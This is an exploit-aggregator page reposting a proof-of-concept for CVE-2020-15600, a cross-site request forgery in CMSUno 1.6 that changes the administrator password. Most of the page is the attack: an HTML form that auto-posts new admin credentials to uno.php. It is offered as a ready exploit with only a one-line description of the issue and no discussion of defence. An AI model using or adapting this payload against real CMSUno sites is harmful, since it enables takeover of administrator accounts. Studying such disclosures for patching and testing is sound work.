Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023090053

Below is a copy:

CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
# Exploit Title: CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
# Date: 2020-07-22
# Exploit Author: Gh05t666include (AnonGhost Indonesia) 
# Vendor Homepage: https://github.com/boiteasite/cmsuno
# Software Link: https://github.com/boiteasite/cmsuno
# Version: v1.6
# CVE : 2020-15600

An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.

PoC : 

<html>
<body>
<script>history.pushState(",",'/')</script>
<form action=http://127.0.0.1/cmsuno-master/uno.phpmethod=POST>
<input type=hidden name=user value=admin/>
<input type=hidden name=pass value=yourpassword/>
<input type=submit name=user value=Submit request/>
</form>
</body>
</html>

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.